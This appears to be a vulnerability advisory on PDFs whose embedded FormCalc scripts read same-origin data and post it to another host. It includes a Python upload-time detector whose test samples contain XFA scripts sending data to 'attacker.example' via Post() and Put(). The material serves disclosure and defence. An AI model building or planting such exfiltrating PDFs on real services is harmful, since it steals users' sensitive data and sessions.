JVNTA#94087669
Using specially crafted PDF files to steal information
Overview
A script written in FormCalc and embedded in a PDF document can read arbitrary content from the same origin on which the PDF is hosted. When an attacker exploits this behavior against a web application or service that allows users to upload arbitrary PDF files, sensitive information on that server may be stolen.
Products Affected
This issue exists under the following server / client combination:
Server: A web application or service that allows users to upload arbitrary PDF files and serves them from the same origin as its other content
Client: An environment where the Adobe PDF plugin is enabled in IE11 or Firefox
Description
PDF allows the creation of documents containing fill-in forms. As the specification enabling this, PDF 1.5 and later support Adobe XML Forms Architecture (XFA), formulated by Adobe. In addition, a scripting language called FormCalc is available for dynamically performing calculations on values entered in a form. Using it, a program can be embedded within a PDF document.
For more information on FormCalc, including its specification, refer to the FormCalc User Reference provided by Adobe.
In addition to functions for various kinds of arithmetic, FormCalc provides a group of functions called URL functions, which include Get(), Post() and Put(). Get() retrieves the content of the URL passed as its parameter; Post() and Put() send the data passed as a parameter to the specified URL. In other words, a program embedded in a PDF can download content from the same origin and post content to a different origin.
This behavior is part of the Adobe XFA specification. An attacker exploiting it may carry out the attacks described in "PDF - Mess with the web".
The attack proceeds as follows:
(1) (Attacker) Upload a PDF document containing a FormCalc script to the web application
(1)' (Attacker) Trick a user into clicking the link to this PDF document
(2) (Victim) The PDF document is loaded in the web browser
(2)' (Victim) FormCalc sends a Get() request in the context of the victim and obtains sensitive data; Post() is then used to send this data to an external server
Since the web browser sends the request in (2)', the request may carry the victim's session cookie.
Adobe has addressed a similar threat in which the Same Origin Policy could be bypassed (CVE-2014-8453). However, Adobe has determined that this behavior within the same origin is expected. Web applications and users must therefore account for it.
Lastly, attack methods are also described in PoC||GTFO 0x12 and in "PDF Special Function (FormCalc)".
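As an added illustration (not code from JVN, JPCERT/CC or Adobe), the following Python script implements the upload-time check a web application could run against the behavior described above: it walks the PDF's stream objects, inflates FlateDecode streams, and reports any XFA <script> element treated as FormCalc that calls Get(), Post() or Put(). The XFA skeleton, hostnames and paths in the sample documents are constructed placeholders, and the minimal PDF wrapping them is built by the script itself. Two details matter for such a filter: FormCalc is the default XFA scripting language, so a <script> without a contentType attribute is FormCalc too, and FormCalc function names are case-insensitive.

```python
"""Upload-time check for PDFs whose XFA forms call FormCalc URL functions.
Added example, not code from JVN, JPCERT/CC or Adobe."""
import re
import zlib

# "N G obj << dict >> stream" followed by CRLF or LF. The tempered dot keeps
# the dictionary from running across "endobj" into the next object.
STREAM_RE = re.compile(
    rb"obj\s*<<(?P<dict>(?:(?!endobj).)*?)>>\s*stream(?:\r\n|\n)", re.S)
# Direct /Length only; an indirect reference (/Length 4 0 R) is not matched
# and the code falls back to searching for "endstream".
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")
# XFA <script> elements. FormCalc is the default XFA script language, so a
# <script> with no contentType attribute is FormCalc as well.
SCRIPT_RE = re.compile(rb"<script\b(?P<attrs>[^>]*)>(?P<body>.*?)</script>",
                       re.I | re.S)
# The three FormCalc URL functions; FormCalc names are case-insensitive.
URL_FUNC_RE = re.compile(rb"\b(get|post|put)\s*\(", re.I)


def iter_streams(pdf: bytes):
    """Yield (stream dictionary, raw stream bytes) for each stream object."""
    for m in STREAM_RE.finditer(pdf):
        start = m.end()
        length = LENGTH_RE.search(m.group("dict"))
        if length:
            body = pdf[start:start + int(length.group(1))]
        else:
            end = pdf.find(b"endstream", start)
            if end < 0:
                continue
            body = pdf[start:end].rstrip(b"\r\n")
        yield m.group("dict"), body


def decode_stream(dictionary: bytes, body: bytes) -> bytes:
    """Inflate FlateDecode streams; other filters are left undecoded here."""
    if b"/FlateDecode" not in dictionary:
        return body
    try:
        return zlib.decompress(body)
    except zlib.error:
        return b""


def find_formcalc_url_calls(pdf: bytes) -> list[str]:
    """Lower-cased, de-duplicated FormCalc URL functions called by any XFA
    script in the PDF; an empty list means nothing was flagged."""
    found = set()
    for dictionary, body in iter_streams(pdf):
        for s in SCRIPT_RE.finditer(decode_stream(dictionary, body)):
            if b"javascript" in s.group("attrs").lower():
                continue  # JavaScript script, outside this check's scope
            found.update(f.decode().lower()
                         for f in URL_FUNC_RE.findall(s.group("body")))
    return sorted(found)


def build_sample_pdf(xfa_xml: bytes, compress: bool) -> bytes:
    """Constructed test input: a minimal (not fully valid) PDF whose AcroForm
    /XFA entry points at one stream holding the XFA XML."""
    body = zlib.compress(xfa_xml) if compress else xfa_xml
    filt = b"/Filter /FlateDecode " if compress else b""
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj\n<< /Type /Catalog /AcroForm 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Fields [] /XFA 3 0 R >>\nendobj\n",
        b"3 0 obj\n<< ", filt, b"/Length ", str(len(body)).encode(), b" >>\n",
        b"stream\n", body, b"\nendstream\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ])


# Constructed payload in the shape the advisory describes: Get() reads a
# same-origin resource, Post() sends it elsewhere. Hosts/paths are placeholders.
EXFIL_XFA = b"""<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1"><event activity="initialize">
<script contentType="application/x-formcalc">
  var secret = Get("https://app.example/api/account")
  Post("https://attacker.example/collect", secret)
</script></event></subform></template></xdp:xdp>"""

# Ordinary form logic: FormCalc arithmetic, no URL functions.
BENIGN_XFA = b"""<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template><subform name="form1"><field name="total"><calculate>
<script contentType="application/x-formcalc">Sum(price * qty, 0)</script>
</calculate></field></subform></template></xdp:xdp>"""

# No contentType at all: FormCalc by default, so still flagged.
NO_CONTENTTYPE_XFA = b"""<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template><subform name="form1"><event activity="initialize">
<script>Put("https://attacker.example/drop", "uploaded form data")</script>
</event></subform></template></xdp:xdp>"""

if __name__ == "__main__":
    for name, xfa in (("exfil", EXFIL_XFA), ("benign", BENIGN_XFA),
                      ("no-contenttype", NO_CONTENTTYPE_XFA)):
        flagged = find_formcalc_url_calls(build_sample_pdf(xfa, compress=True))
        print(f"{name}: {'REJECT ' + ', '.join(flagged) if flagged else 'ok'}")
```

The stream walker handles only flat streams that are uncompressed or FlateDecode with a direct /Length; real documents also use object streams, other filters and an /XFA entry split across an array of streams, so a production filter should sit on a full PDF parser (and simply rejecting or flattening any XFA form is easier to get right than enumerating dangerous functions). The check complements, rather than replaces, serving uploads from a separate origin.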
Impact
Effects similar to stored XSS or CSRF may occur.
In other words, an attacker may obtain sensitive content from the server, or may send forged requests in the victim's context to obtain account information or change system settings.
Solution
User-side countermeasures
Disable the Adobe PDF plugin in the web browser (IE11, Firefox)
Server-side countermeasures
Serve user-uploaded PDF documents from a separate, sandboxed domain: an origin different from the application's own (different scheme, host or port) that hosts nothing sensitive, so that a Get() issued by a script in an uploaded PDF can only reach other uploaded files.
Note that adding Content-Disposition: attachment to the HTTP response header is not a countermeasure: if the attacker embeds the PDF in web content (for example via an <object> or <embed> element), the plugin ignores the header.
Vendor Status
Vendor | Status | Last Update | Vendor Notes |
---|---|---|---|
BizMobile Inc. | Not Vulnerable | 2017/12/21 | |
Cybozu, Inc. | Vulnerable | 2016/11/18 | Cybozu, Inc. website |
JT Engineering inc. | Not Vulnerable | 2020/08/25 | |
References
- Adobe: FormCalc User Reference
- OWASP AppSecEU 15: PDF - Mess with the web
- International Journal of Proof-of-Concept or Get The Fuck Out (PoC||GTFO): PoC||GTFO 0x12
- Hack Patch!: PDF Special Function (FormCalc)
JPCERT/CC Addendum
Vulnerability Analysis by JPCERT/CC
Credit
Update History
- 2017/12/21
- BizMobile Inc. update status
- 2020/08/27
- JT Engineering inc. update status